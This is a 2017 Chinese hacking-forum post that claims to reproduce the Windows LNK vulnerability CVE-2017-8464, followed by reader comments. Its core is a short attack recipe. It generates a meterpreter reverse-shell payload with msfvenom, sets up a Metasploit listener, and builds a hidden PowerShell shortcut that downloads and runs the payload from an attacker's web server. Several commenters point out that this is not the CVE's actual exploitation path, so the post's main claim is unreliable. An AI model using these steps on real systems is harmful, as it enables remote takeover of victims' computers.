Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞 完整复现

2017-06-16 08:53:47 19 3927 1
很抱歉,这个CVE是我自己复现过把过程发到吐司里的,因为吐司并没有关于这个CVE的文章。

该CVE复现并不是我原创的,下次在板块发帖会注意,以后这类的文章会发到技术讨论区。

========================================

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
具体详情如下:         

漏洞编号: CVE-2017-8464
漏洞名称: Microsoft Windows
官方评级:高危
漏洞利用条件和方式: 远程利用
漏洞影响范围: 桌面系统
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1

服务器系统
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016


漏洞简介

RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小。
攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制,文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件,打开此驱动器 (或远程共享) 时,恶意文件就会在目标系统上执行攻击者的代码。

漏洞复现

#1

使用msfvenom生成ps1文件

命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=*.*.*.* LPORT=**** -f psh-reflection >***.ps1
#2

将生成的ps1文件放到web目录下,使该文件可以被HTTP访问。

#3

metasploit做以下相关配置:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST *.*.*.*
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run
#4
创建快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://*.*.*.*/sonar.ps1');xx.ps1"
#5

执行这个快捷方式



TCV=0

关于作者

评论19次

要评论?请先  登录  或  注册
  • 19楼
    2018-1-23 14:38

    哎,鸡肋的一B的洞,不怎么实用

  • 18楼
    2017-6-24 10:50

    我这边在内网环境下能接受到,但是自己设置了外网搞,在这里就卡住了,请问下你知道是什么原因吗?

    [*] Started reverse TCP handler on 192.168.0.4:1721 [*] Starting the payload handler...[*] Sending stage (1189423 bytes) to 61.235.13.24

  • 17楼
    2017-6-17 08:46

    这个webshell不好操作

  • 16楼
    2017-6-16 23:06

    我先说一下,其实我感觉这个漏洞很鸡肋,需要其它漏洞的配合。如果能建快捷方式,那还需要这个洞干嘛。。

  • 15楼
    2017-6-16 22:40

    其实我就一吃瓜群众,本来不想说但是还是忍不住说下,人家楼主帖子分类为原创怎么了,几乎评论都在说这个问题,与人家楼主发的帖子的关注点都变了,土司的宗旨是“低调求发展”,真是不是原创很重要吗?难道分类为原创人家楼主又能得到什么好处吗?看到楼主再次编辑了帖子,开头的两句话真的说的有点看不下去了。既然没有什么独特见解,那你也别乱评论直接否定人家楼主的成果啊,就为了刷个200积分吗?即使你刷到了200积分,或许你的技术还是撑不起你的注册会员的牌子。还评论区一片干净吧,很多时候大牛们在评论区的评论技术价值很高的,别有大牛看到帖子有什么好的评论想说,看到这么多关注点不一样的评论,或许大牛想想也算了,所以望大家珍惜。

  • 14楼
    2017-6-16 15:07

    我怎么在论坛发现两篇这样的文章呢。。。说的还都不对。。。尴尬

  • 13楼
    2017-6-16 12:53

    为啥我建立快捷方式提示打不开powershell

  • 12楼
    2017-6-16 11:09

    快捷方式哪个吧,当天土司出了的

  • 11楼
    2017-6-16 11:08

    这个不是远程代码 执行的那个 这个洞远程代码执行的就是不用点击只需要资源管理器解析 lnk 文件自动运行貌似就是只要受害者浏览了有这种 恶意快捷方式的文件夹会自动解析运行这种点击运行的早就有了根本 不算洞

  • 10楼
    2017-6-16 10:51

    老哥没被踩算你运气好

  • 9楼
    2017-6-16 10:37

    要手动点击快捷方式,你还不如直接放个伪造图标的exe。瞎搞!这怎么可能是这个漏洞的利用姿势。。。。。。。。。。。

  • 8楼
    2017-6-16 10:21

    这个确定就是那个远程代码执行????只是建立一个powershell脚本的快捷方式然后让人运行

  • 7楼
    2017-6-16 10:15

    这个我在推特上面就看见了,不过还是感谢大老远搬到国内分享。

  • 6楼
    2017-6-16 10:04

    话说当天还讨论,POWERSHELL杀软杀光光

  • 5楼
    2017-6-16 09:08

    这个不是震网3吗,前几天就出来了

  • 4楼
    2017-6-16 09:08

    个人感觉是转载或者自己尝试了 然后截图把

  • 3楼
    2017-6-16 09:03

    这利用方法昨天别人利用视频都出了吧

  • 2楼
    2017-6-16 09:02

    额 转指尖的……这个漏洞利用土司当天就出exp了……https://www.t00ls.net/thread-40441-1-2.html另外,有没有搜索那个的

  • 1楼
    2017-6-16 08:56

    老哥 你原创?开玩笑吧。。